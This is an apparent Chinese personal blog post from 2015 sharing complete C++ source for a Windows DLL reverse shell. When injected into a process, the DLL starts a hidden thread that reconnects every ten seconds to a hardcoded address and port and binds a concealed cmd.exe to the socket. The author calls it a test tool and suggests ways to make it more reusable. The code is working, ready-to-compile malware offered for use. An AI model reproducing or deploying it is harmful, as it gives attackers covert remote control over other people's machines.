注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

且行且记录

点滴记录,行的更远!

 
 
 

日志

 
 

以前的一个简单反弹shell,测试用  

2015-05-27 12:27:57|  分类: 利用程序 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
这是在一个最小shell源码的基础上改的,测试用,以前是每次连接成功与不成功都运行命令,
后来加了条件,只在连接成功的时候运行命令,每周期反弹一下。
里面的参数都是固定的,其实可以用文件名来存储地址端口等,这样就通用好一点,至少不用
编译了,只要改下文件名就可以了。

// 注入进程后会反弹shell
// cl /LD revdll.cpp
#include <winsock2.h>

#pragma comment(lib,"ws2_32.lib")

DWORD WINAPI ClientThread(LPVOID lpParam)
{
while(1){
STARTUPINFO          si;
struct sockaddr_in   sa;
PROCESS_INFORMATION  pi;
SOCKET s,ss;
WSADATA              HWSAdata;
int err;

WSAStartup(0x101, &HWSAdata); 

s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0);

sa.sin_family     = AF_INET;
sa.sin_port       = htons(8080); //远程端口
sa.sin_addr.s_addr= inet_addr("192.168.10.247"); //远程地址

err=connect(s,(struct sockaddr *)&sa,sizeof(sa));
if (!err)
{
ss=s;
ZeroMemory(&si,sizeof(si));
si.cb          = sizeof(si);
si.wShowWindow = SW_HIDE;
si.dwFlags     = STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES;
si.hStdInput   = si.hStdOutput = si.hStdError = (void *) ss;   

si.lpDesktop = si.lpTitle = (char *) 0x0000;
si.lpReserved2 = NULL;

if (CreateProcess( NULL ,"cmd",NULL, NULL,TRUE, 0,NULL,NULL,(STARTUPINFO*)&si,&pi))
{
OutputDebugString("cmd ok!\n");
WaitForSingleObject(pi.hProcess,INFINITE);
closesocket(ss);
}
else
{
OutputDebugString("cmd fail!\n");
}
}
Sleep(10000); //多少时间反弹一次
}
return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDll, DWORD fdwReason, PVOID fImpLoad)
{
HANDLE hThread;
DWORD dwThreadId;

   if (fdwReason == DLL_PROCESS_ATTACH) 
   {
hThread = CreateThread(NULL, 0, ClientThread, NULL, 0, &dwThreadId);

if (hThread == NULL) return TRUE;

CloseHandle(hThread);
   }

   return(TRUE);
}
  评论这张
 
阅读(51)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017